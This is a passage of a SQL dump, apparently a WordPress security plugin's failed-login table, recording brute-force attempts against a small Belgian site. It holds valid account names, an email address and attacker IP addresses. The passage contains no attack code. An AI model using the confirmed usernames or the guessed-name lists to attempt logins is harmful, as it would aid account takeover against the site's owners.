(100051, 1494220451.515729, 1, 'loginFailValidUsername', 'julie', 2, 457123785, 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_58_01) AppleWebKit/534.07.60 (KHTML, like Gecko) Chrome/53.6.1825.7197 Safari/530.77 Edge/34.73756'),
(100052, 1494221825.770326, 1, 'loginFailValidUsername', 'julie', 2, 3059525007, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100053, 1494223268.085177, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1833311020, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100054, 1494223286.843064, 1, 'loginFailInvalidUsername', 'administrador', 0, 1833311020, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100055, 1494223339.014519, 1, 'loginFailInvalidUsername', 'blog', 0, 762746819, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100056, 1494223342.730490, 1, 'loginFailInvalidUsername', 'demo', 0, 1833311020, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100057, 1494223417.682787, 1, 'loginFailInvalidUsername', 'webadmin', 0, 521678460, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100058, 1494223472.180278, 1, 'loginFailInvalidUsername', 'wpadmin', 0, 1743622318, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100059, 1494224217.620854, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1578617924, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100060, 1494224241.519623, 1, 'loginFailInvalidUsername', 'administrador', 0, 762746819, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100061, 1494233048.809167, 1, 'loginFailValidUsername', 'julie', 2, 1001802451, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.11.68 (KHTML, like Gecko) Chrome/53.6.0072.5700 Safari/534.51'),
(100062, 1494244436.876548, 1, 'loginFailValidUsername', 'julie', 2, 736122260, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.98.41 (KHTML, like Gecko) Chrome/57.5.0045.5317 Safari/534.59 OPR/40.6.1868.6130'),
(100063, 1494250430.950477, 1, 'loginFailValidUsername', 'julie', 2, 1402847781, 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.54.07) Gecko/20166103 Firefox/52.54.07'),
(100064, 1494256321.712703, 1, 'loginFailValidUsername', 'julie', 2, 2630546576, 'Mozilla/5.0 (Windows NT 6.3) AppleWebKit/534.05.52 (KHTML, like Gecko) Chrome/57.4.9341.4079 Safari/534.34'),
(100065, 1494262050.451385, 1, 'loginFailValidUsername', 'julie', 2, 2631563820, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.03.56 (KHTML, like Gecko) Version/5.5.0 Safari/532.10'),
(100066, 1494267747.386054, 1, 'loginFailValidUsername', 'julie', 2, 2987835433, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/532.83.36 (KHTML, like Gecko) Chrome/56.4.9528.4891 Safari/534.54 OPR/44.5.0341.5613'),
(100067, 1494273429.093639, 1, 'loginFailValidUsername', 'julie', 2, 781607262, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_29_77) AppleWebKit/530.61.18 (KHTML, like Gecko) Chrome/55.1.5953.0680 Safari/532.00'),
(100068, 1494275333.276593, 1, 'loginFailValidUsername', 'julie', 2, 96794361, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100069, 1494275333.927779, 1, 'loginFailValidUsername', 'julie', 2, 96794361, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100070, 1494275334.587700, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 96794361, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100071, 1494275335.237436, 1, 'loginFailValidUsername', 'pablo', 3, 96794361, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100072, 1494275335.879949, 1, 'loginFailValidUsername', 'admin', 1, 96794361, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100073, 1494291560.175931, 1, 'loginFailValidUsername', 'julie', 2, 3190654548, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/530.66.13 (KHTML, like Gecko) Chrome/55.0.5436.0264 Safari/532.06 OPR/41.9.4713.9441'),
(100074, 1494298029.411056, 1, 'loginFailValidUsername', 'julie', 2, 3243069014, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/531.74.21 (KHTML, like Gecko) Chrome/55.1.6285.1912 Safari/532.03 OPR/42.0.5462.9190'),
(100075, 1494304480.785613, 1, 'loginFailValidUsername', 'julie', 2, 1610003583, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/531.73.20 (KHTML, like Gecko) Chrome/56.1.6147.1875 Safari/532.12 OPR/42.0.5335.0063'),
(100076, 1494310133.818797, 1, 'loginFailValidUsername', 'admin', 1, 736163900, 'XML-RPC.NET'),
(100077, 1494310936.218019, 1, 'loginFailValidUsername', 'julie', 2, 3411101549, 'Mozilla/5.0 (Windows NT 6.0; rv:45.64.01) Gecko/20152151 Firefox/45.64.01'),
(100078, 1494317156.488803, 1, 'loginFailValidUsername', 'julie', 2, 528523110, 'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/533.96.49 (KHTML, like Gecko) Chrome/57.5.0846.5118 Safari/530.67 OPR/40.6.2569.7831'),
(100079, 1494324707.225711, 1, 'loginFailValidUsername', 'admin', 1, 1743082501, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100080, 1494329170.220379, 1, 'loginFailValidUsername', 'julie', 2, 1489603430, 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_58_01) AppleWebKit/534.16.69 (KHTML, like Gecko) Chrome/53.6.1806.7178 Safari/530.77 Edge/34.83572'),
(100081, 1494335196.319019, 1, 'loginFailValidUsername', 'julie', 2, 736614910, 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/535.13.76 (KHTML, like Gecko) Version/4.7.2 Safari/533.31'),
(100082, 1494341198.178507, 1, 'loginFailValidUsername', 'julie', 2, 3159064624, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_25_88; rv:45.76.29) Gecko/20131478 Firefox/45.76.29'),
(100083, 1494343641.217313, 1, 'loginFailInvalidUsername', 'notre', 0, 2917982362, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100084, 1494343643.115287, 1, 'loginFailInvalidUsername', 'pour', 0, 2917982362, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100085, 1494343644.985104, 1, 'loginFailInvalidUsername', 'cross', 0, 2917982362, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100086, 1494343646.908742, 1, 'loginFailInvalidUsername', 'objectifs', 0, 2917982362, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100087, 1494343649.042228, 1, 'loginFailInvalidUsername', 'venez', 0, 2917982362, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100088, 1494343650.898066, 1, 'loginFailInvalidUsername', 'outils', 0, 2917982362, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1');
INSERT INTO `www2_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(100089, 1494343652.854581, 1, 'loginFailInvalidUsername', 'professionnel', 0, 2917982362, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100090, 1494343654.828309, 1, 'loginFailInvalidUsername', 'travail', 0, 2917982362, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100091, 1494343657.673368, 1, 'loginFailInvalidUsername', 'namur', 0, 2917982362, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100092, 1494343659.706190, 1, 'loginFailInvalidUsername', 'center', 0, 2917982362, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100093, 1494344413.478876, 1, 'loginFailInvalidUsername', 'test', 0, 3590043250, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100094, 1494344829.131689, 1, 'loginFailInvalidUsername', 'user', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100095, 1494344830.953201, 1, 'loginFailInvalidUsername', 'user', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100096, 1494344832.763122, 1, 'loginFailInvalidUsername', 'user', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100097, 1494344834.599632, 1, 'loginFailInvalidUsername', 'user', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100098, 1494344836.445443, 1, 'loginFailInvalidUsername', 'user', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100099, 1494344838.347988, 1, 'loginFailInvalidUsername', 'user', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100100, 1494344840.195090, 1, 'loginFailValidUsername', 'admin', 1, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100101, 1494344842.028954, 1, 'loginFailValidUsername', 'admin', 1, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100102, 1494344843.859600, 1, 'loginFailValidUsername', 'julie', 2, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100103, 1494344845.898923, 1, 'loginFailValidUsername', 'pablo', 3, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100104, 1494345339.842912, 1, 'loginFailInvalidUsername', 'vous', 0, 1299175467, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100105, 1494347044.128576, 1, 'loginFailValidUsername', 'julie', 2, 3183178439, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/530.66.13 (KHTML, like Gecko) Chrome/55.1.5516.0244 Safari/532.06 OPR/42.9.4794.9422'),
(100106, 1494352811.132894, 1, 'loginFailValidUsername', 'julie', 2, 657107382, 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/534.17.60 (KHTML, like Gecko) Version/4.7.2 Safari/533.34'),
(100107, 1494358577.932459, 1, 'loginFailValidUsername', 'julie', 2, 1742133325, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/530.63.10 (KHTML, like Gecko) Chrome/55.0.5127.0855 Safari/532.02 OPR/41.9.4404.9132'),
(100108, 1494364417.351143, 1, 'loginFailValidUsername', 'julie', 2, 2979827550, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/536.36.89 (KHTML, like Gecko) Chrome/54.8.4837.9109 Safari/531.97'),
(100109, 1494376423.065829, 1, 'loginFailValidUsername', 'julie', 2, 2001428387, 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.69.12) Gecko/20161628 Firefox/52.69.12'),
(100110, 1494381206.595518, 1, 'loginFailValidUsername', 'julie', 2, 3004848413, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_31_84) AppleWebKit/532.90.43 (KHTML, like Gecko) Chrome/57.5.0283.5555 Safari/534.51 Edge/34.67344'),
(100111, 1494387678.942648, 1, 'loginFailValidUsername', 'julie', 2, 1934610389, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.18.65 (KHTML, like Gecko) Chrome/53.6.0648.5376 Safari/534.57'),
(100112, 1494394076.643271, 1, 'loginFailValidUsername', 'julie', 2, 1389492631, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/536.38.81 (KHTML, like Gecko) Chrome/54.8.4090.9363 Safari/531.99'),
(100113, 1494406468.533725, 1, 'loginFailValidUsername', 'julie', 2, 3058309450, 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_55_08) AppleWebKit/534.04.57 (KHTML, like Gecko) Chrome/53.6.1611.6983 Safari/530.75 Edge/34.71626'),
(100114, 1494418422.204496, 1, 'loginFailValidUsername', 'julie', 2, 3075668780, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_36_88) AppleWebKit/532.94.47 (KHTML, like Gecko) Chrome/57.4.9601.5973 Safari/534.55'),
(100115, 1494424332.222221, 1, 'loginFailValidUsername', 'julie', 2, 453246710, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/531.60.18 (KHTML, like Gecko) Chrome/55.1.5972.0600 Safari/532.00 OPR/42.9.4169.9897'),
(100116, 1494430204.331461, 1, 'loginFailValidUsername', 'julie', 2, 1744766542, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/530.67.14 (KHTML, like Gecko) Chrome/55.1.5677.0305 Safari/532.07 OPR/41.9.4855.9583'),
(100117, 1494435792.059045, 1, 'loginFailValidUsername', 'julie', 2, 1768589606, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.17.64 (KHTML, like Gecko) Chrome/53.5.0672.5300 Safari/534.47'),
(100118, 1494439952.522844, 1, 'loginFailValidUsername', 'julie', 2, 3190256054, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.13.66 (KHTML, like Gecko) Version/4.7.2 Safari/533.21'),
(100119, 1494445481.624401, 1, 'loginFailValidUsername', 'julie', 2, 1410741964, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.08.51 (KHTML, like Gecko) Version/5.6.1 Safari/532.15'),
(100120, 1494449630.290643, 1, 'loginFailValidUsername', 'julie', 2, 1469388680, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/531.74.21 (KHTML, like Gecko) Chrome/56.2.6224.1952 Safari/532.13 OPR/42.0.5501.0239'),
(100121, 1494453790.049272, 1, 'loginFailValidUsername', 'julie', 2, 2323001623, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.29.82 (KHTML, like Gecko) Chrome/54.8.3185.8457 Safari/531.90'),
(100122, 1494458200.523648, 1, 'loginFailValidUsername', 'julie', 2, 3308264343, 'Mozilla/5.0 (Windows NT 6.2; Win64) AppleWebKit/530.63.00 (KHTML, like Gecko) Chrome/55.0.5131.0869 Safari/531.93 OPR/41.9.3418.8146'),
(100123, 1494462514.811885, 1, 'loginFailValidUsername', 'julie', 2, 1892208309, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.84.31 (KHTML, like Gecko) Version/5.2.7 Safari/530.76'),
(100124, 1494467001.981335, 1, 'loginFailValidUsername', 'julie', 2, 609118280, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_28_81) AppleWebKit/532.87.30 (KHTML, like Gecko) Chrome/57.4.9922.4294 Safari/534.58'),
(100125, 1494471511.262246, 1, 'loginFailValidUsername', 'julie', 2, 2107873451, 'Mozilla/5.0 (Windows NT 6.0; rv:45.66.03) Gecko/20155056 Firefox/45.66.03'),
(100126, 1494472932.299568, 1, 'loginFailValidUsername', 'admin', 1, 1389487932, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100127, 1494476036.342306, 1, 'loginFailValidUsername', 'julie', 2, 3211855785, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_48_91) AppleWebKit/533.07.50 (KHTML, like Gecko) Chrome/57.5.0904.6276 Safari/530.67 Edge/34.73549'),
(100128, 1494480556.931328, 1, 'loginFailValidUsername', 'julie', 2, 2588180238, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/531.79.26 (KHTML, like Gecko) Chrome/56.2.6802.1530 Safari/532.19 OPR/42.0.5089.0717'),
(100129, 1494491133.608045, 1, 'loginFailValidUsername', 'julie', 2, 2996213217, 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.55.18) Gecko/20167850 Firefox/52.55.18'),
(100130, 1494497128.816834, 1, 'loginFailValidUsername', 'julie', 2, 696935125, 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.64.17) Gecko/20176812 Firefox/45.64.17'),
(100131, 1494503072.101910, 1, 'loginFailValidUsername', 'julie', 2, 1744766316, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.22.85 (KHTML, like Gecko) Chrome/54.8.3311.8683 Safari/531.92'),
(100132, 1494508951.619215, 1, 'loginFailValidUsername', 'julie', 2, 2081250832, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.80.27 (KHTML, like Gecko) Chrome/56.2.7823.1550 Safari/532.19 OPR/42.1.5100.0838'),
(100133, 1494514787.949353, 1, 'loginFailValidUsername', 'julie', 2, 1347203962, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/532.86.33 (KHTML, like Gecko) Version/5.3.8 Safari/530.79'),
(100134, 1494519754.579324, 1, 'loginFailInvalidUsername', 'namur', 0, 1009505852, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100135, 1494519766.544185, 1, 'loginFailInvalidUsername', 'center', 0, 1009505852, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100136, 1494519772.854971, 1, 'loginFailValidUsername', 'admin', 1, 1009505852, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100137, 1494519780.273676, 1, 'loginFailValidUsername', 'julie', 2, 1009505852, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100138, 1494519791.297207, 1, 'loginFailValidUsername', 'pablo', 3, 1009505852, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100139, 1494519802.256258, 1, 'loginFailInvalidUsername', 'vous', 0, 1009505852, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100140, 1494519811.497959, 1, 'loginFailInvalidUsername', 'training', 0, 1009505852, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100141, 1494519817.354555, 1, 'loginFailInvalidUsername', 'notre', 0, 1009505852, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100142, 1494519822.463162, 1, 'loginFailInvalidUsername', 'pour', 0, 1009505852, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100143, 1494519826.764700, 1, 'loginFailInvalidUsername', 'cross', 0, 1009505852, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100144, 1494520585.950960, 1, 'loginFailInvalidUsername', 'objectifs', 0, 1743847615, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100145, 1494520601.831770, 1, 'loginFailValidUsername', 'julie', 2, 3195175839, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.70.23) Gecko/20172282 Firefox/45.70.23'),
(100146, 1494521117.313936, 1, 'loginFailInvalidUsername', 'info@crosstrainingcenter.be', 0, 2513063543, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100147, 1494521597.170272, 1, 'loginFailInvalidUsername', 'info@crosstrainingcenter.be', 0, 1570692602, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100148, 1494522195.241519, 1, 'loginFailInvalidUsername', 'webmaster', 0, 2575217096, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100149, 1494522199.496904, 1, 'loginFailInvalidUsername', 'webmaster', 0, 2575217096, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100150, 1494522201.771087, 1, 'loginFailInvalidUsername', 'webmaster', 0, 2575217096, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100151, 1494522204.329105, 1, 'loginFailInvalidUsername', 'webmaster', 0, 2575217096, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100152, 1494522206.822933, 1, 'loginFailInvalidUsername', 'webmaster', 0, 2575217096, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100153, 1494522209.394825, 1, 'loginFailInvalidUsername', 'webmaster', 0, 2575217096, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100154, 1494522211.949903, 1, 'loginFailInvalidUsername', 'webmaster', 0, 2575217096, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100155, 1494522214.265599, 1, 'loginFailInvalidUsername', 'testuser', 0, 2575217096, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100156, 1494522216.518553, 1, 'loginFailInvalidUsername', 'test@crosstrainingcenter.be', 0, 2575217096, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100157, 1494522218.827426, 1, 'loginFailInvalidUsername', 'test', 0, 2575217096, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100158, 1494522689.696564, 1, 'loginFailValidUsername', 'admin', 1, 2901752882, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100159, 1494523099.923597, 1, 'loginFailInvalidUsername', 'outils', 0, 1572433768, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100160, 1494526262.022203, 1, 'loginFailValidUsername', 'julie', 2, 789310186, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_48_91) AppleWebKit/533.07.50 (KHTML, like Gecko) Chrome/57.5.1963.6235 Safari/530.68 Edge/34.74146'),
(100161, 1494537660.701063, 1, 'loginFailValidUsername', 'julie', 2, 2630488184, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.80.27 (KHTML, like Gecko) Version/5.2.7 Safari/530.63'),
(100162, 1494543641.651066, 1, 'loginFailValidUsername', 'julie', 2, 3065626300, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/531.79.26 (KHTML, like Gecko) Chrome/56.1.6784.1411 Safari/532.18 OPR/42.0.5061.0799'),
(103121, 1499367518.260714, 1, 'loginFailInvalidUsername', 'test', 0, 531691445, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103122, 1499367589.292903, 1, 'loginFailInvalidUsername', 'test', 0, 623913265, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103123, 1499367590.412982, 1, 'loginFailInvalidUsername', 'test', 0, 623913265, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103124, 1499367753.800922, 1, 'loginFailInvalidUsername', 'test', 0, 1306113027, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103125, 1499367754.824563, 1, 'loginFailInvalidUsername', 'test', 0, 1306113027, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103126, 1499377875.383862, 1, 'loginFailInvalidUsername', 'test', 0, 1359726059, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103127, 1499377876.370050, 1, 'loginFailInvalidUsername', 'test', 0, 1359726059, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103128, 1499381652.855620, 1, 'loginFailInvalidUsername', 'test', 0, 3137707330, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103129, 1499381654.252044, 1, 'loginFailInvalidUsername', 'test', 0, 3137707330, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103130, 1499382119.555222, 1, 'loginFailInvalidUsername', 'test', 0, 1706102778, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103131, 1499382121.095779, 1, 'loginFailInvalidUsername', 'test', 0, 1706102778, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103132, 1499382332.017429, 1, 'loginFailInvalidUsername', 'test', 0, 87144572, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103133, 1499382333.181908, 1, 'loginFailInvalidUsername', 'test', 0, 87144572, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103134, 1499382672.620203, 1, 'loginFailInvalidUsername', 'test', 0, 3381025341, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103135, 1499382673.869874, 1, 'loginFailInvalidUsername', 'test', 0, 3381025341, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103136, 1499382768.294801, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_31_88) AppleWebKit/531.72.20 (KHTML, like Gecko) Chrome/56.2.7128.1856 Safari/532.12 Edge/36.06779'),
(103137, 1499383619.455953, 1, 'loginFailValidUsername', 'admin', 1, 2745975732, 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)'),
(103138, 1499384738.106606, 1, 'loginFailInvalidUsername', 'test', 0, 3376883719, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103139, 1499385425.952231, 1, 'loginFailInvalidUsername', 'test', 0, 1977359605, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
